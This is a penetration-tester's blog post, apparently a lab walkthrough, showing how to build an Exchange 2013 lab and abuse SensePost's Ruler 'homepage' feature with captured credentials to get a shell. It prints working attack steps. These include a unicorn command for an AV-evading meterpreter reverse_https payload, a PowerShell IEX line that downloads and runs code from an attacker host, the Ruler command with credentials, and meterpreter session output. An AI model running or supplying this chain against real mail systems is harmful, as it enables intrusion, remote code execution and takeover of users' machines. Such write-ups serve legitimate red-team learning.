Ruler is Amazing, got creds get a shell

by @myexploit

OK this is a quick post, if you want to lab ruler, I’m sorry to say that the prereqs are painful, but it is 100% worth the pain.

To start with a big shout-out to https://github.com/sensepost/ruler for the release of this amazing tool. If you don’t want to compile it worry not as Sensepost have compiled versions which can be downloaded here https://github.com/sensepost/ruler/releases

OK so what does Ruler do?

Put simple, snag creds, target OWA get a shell, simple as that, but wait what if you want to try it out in a lab, oh not so easy, sorry to say your going to have to build exchange (Or look at Office 365 as a costly alternative).

By the way this is not a how to build exchange blog post, simply because, the whole process is so painful, time consuming and if honest I dont want to waste more time on the prep, the tool is what I was interested in, but just to show good willing, this will help you if you are attempting your own build of Exchange.

I opted for the following;

Server 2008R2 – https://www.microsoft.com/en-gb/download/details.aspx?id=11093
Exchange Server 2013 – https://www.microsoft.com/en-gb/evalcenter/evaluate-exchange-server-2013#evaluation_477
Windows 7 host machine – https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Good news the above are free for labbing, I built the above in VB https://www.virtualbox.org/wiki/Downloads

So quick how to, please for your sanity learn from my mistakes, there is no short cuts while attempting to build exchange that will work, you have to build it correctly!!!

1. Build Server 2008 R2 VB machine, give it 2 GB of RAM, 60 GB of Storage, and then make it a domain controller, this can help with this section https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/

2. Build a second Server 2008 R2 VB machine. (This will be the Exchange Server) Important 5+ GB of RAM more the better, 2 CPU cores, 100 +GB of Storage, sorry but Exchange is a beast. Once built add this to your domain.

3. Install every single missing patch you can from Microsoft (Yes this will take you 8+ hours!!! but if you try and miss this stage out, Exchange will spot it midway through and say nope, then give up!!)

4. Reboot, to install the patches, then rerun as a number will fail and need replying.

(I tried to clone a server that was fully patched at this point, oh that was a new level of pain, not the cloning that was easy, but adding a cloned server to VB then adding it to the domain, put it this way have you ever seen a “domain admin” account not have the rights to disable UAC or access another users directory, I have now! not a quick fix. Best tip just wait the 8+ hours it takes to install all the updates!)

5. Now extract the downloaded Exchange-x64 to a directory that you defined (Do this on your chosen exchange server), do not extract it to your desktop, or you will see the result of 50+ files vomited over a desktop, yes the installer is a messy one!

6. Make sure the domain account your about to install exchange with is a member of the following security groups, Enterprise Admin, Schema Admins.

7. Open the directory that you extracted Exchange installer to and hunt for setup right click and run this with admin rights.

8. Read the questions it asks you, before you get that far, the installer will check your server for readiness, it will 100% fail and require you to install the correct versions of .net and so on, don’t stress the installer will list all you need to pass, copy every link down, and download the files, install and few hours latter, re run setup this time you should be OK, so what did I do next, in a true professional manner I ticked everything I could, called it Exchange2 when prompted for a name (Don’t ask me about Exchnage1 I’m not ready to talk about it) and eventually I got to the end. This is great apart from what do you do now? I kid you not you don’t even get a sign saying “Hey try this https://127.0.0.1/OWA” nothing, and nothing is installed in your tool bar that is of any real help, you see exchange is a web service which runs on IIS, yep it bundles that into the install.

9. Open FF (Use IE to install it!) and then browse to https://127.0.0.1/OWA for good luck you can also try https://127.0.0.1/ecp eventually it will load a typical OWA login page, use your domain user account and log in, this should then redirect you to the admin page.

10. I use Ubuntu as a base in my lab, I needed to set up a static DNS record on my host machine so ruler could access the email domain names of @server1.hacklab.local to do this simply

nano /etc/hosts

And add your exchange domain names below is an example of my local hosts file

127.0.0.1 localhost
127.0.1.1 ubuntu
192.168.1.21 server1.hacklab.local
192.168.1.21 exchange2.server1.hacklab.local

The server1.hacklab.local and exchange2.server1.hacklab.local are set to point to my exchange server, this is most likely not the smartest way of doing this, but I wanted quick fix for internal use, without this ruler would not have a clue from my Ubuntu box how to access the VB exchange box.

11. Now you can use Ruler, let the shells rain!!

I found from labbing that a lot of ruler options just don’t work in the above built lab, but Homepage works a treat – https://github.com/sensepost/ruler/wiki/Homepage

I created the payload in my lab using the amazing unicorn, (Nods to Mr Kennedy and the rest of trustedsec, helping me get DA for years) https://github.com/trustedsec/unicorn

To get unicorn simply run

git clone https://github.com/trustedsec/unicorn.git

And for this lab I opted on the below syntax which creates a PS one liner that will give you a MSF reverse shell, and will bypass AV ;0)

python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443

The above will spit out two files, powershell_attack.txt and unicorn.rc

1. Move powershell_attack.txt to /var/www/html
2. Start MSF handler msfconsole -r unicorn.rc
3. Create a HTML/vbscript file to use with ruler, details on this can be read here https://github.com/sensepost/ruler/wiki/Homepage which to my delight the POC starts notepad, I love seeing something different than CMD :0)

I wanted to test the above with an MSF shell opposed to notepad and it was quite easy, I tried to add the HTML/vbscript below but WP will not have it, im sorry to say, so look at the above example in https://github.com/sensepost/ruler/wiki/Homepage and simply replace the line
cmd.Run("notepad")
with
cmd.Run("powershell.exe -exec bypass -c IEX (new-object system.net.webclient).downloadstring('http://192.168.1.4/powershell_attack.txt')")

4. Save your created web page to /var/www/html you can name it any name you like, I used the the original demo title of pew.html
5. Start your web server, service apache2 start

So what does the above do?

Ruler used with credentials, targeted against OWA or Office 365, logs in, and adds your created web homepage (The homepage allows you to customise the default view for any folder in Outlook to read more see https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/), to the targets outlook client, when the target clicks on any directory in outlook it makes the above trigger, the above tells the targets machine to run powershell, download and execute the script from the defined IP address, this contains the payload created by unicorn, you get a shell.

But how do you use ruler to do the above?

./ruler-linux64 --email DA1@server1.hacklab.local --username da1 --password Passw0rd! --insecure homepage add --url "http://192.168.1.4/pew.html"

And you should see the following response

[+] Retrieving MAPI/HTTP info
[+] Binding to RPC
[+] Creating new endpoint
[+] Verifying...
[+] New endpoint set
[+] Trying to force trigger

The target has to click on any directory in outlook to trigger.

And you should see ;0)

msf exploit(multi/handler) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows SERVER1\DA1 @ HOST1 192.168.1.4:443 -> 192.168.1.24:50527 (192.168.1.24)
2 meterpreter x86/windows SERVER1\DA1 @ HOST1 192.168.1.4:443 -> 192.168.1.24:50531 (192.168.1.24)
3 meterpreter x86/windows SERVER1\DA1 @ HOST1 192.168.1.4:443 -> 192.168.1.24:50534 (192.168.1.24)
4 meterpreter x86/windows SERVER1\DA1 @ HOST1 192.168.1.4:443 -> 192.168.1.24:50537 (192.168.1.24)

And to delete the homepage simply

./ruler-linux64 --email DA1@server1.hacklab.local --username da1 --password Passw0rd! --insecure homepage delete

And again you should see the following response

[+] Retrieving MAPI/HTTP info
[+] Binding to RPC
[+] Unsetting homepage. Remember to use 'add' if you want to reset this to the original value
[+] Verifying...
[+] Webview reset
[+] Cleaning up and removing trigger

I have tried this with a standard domain user and you still get a shell, so to conclude, while on an authorised SE engagement, and you get creds, if the target has OWA, get a shell!!!

Thanks to sensepost for the amazing Ruler.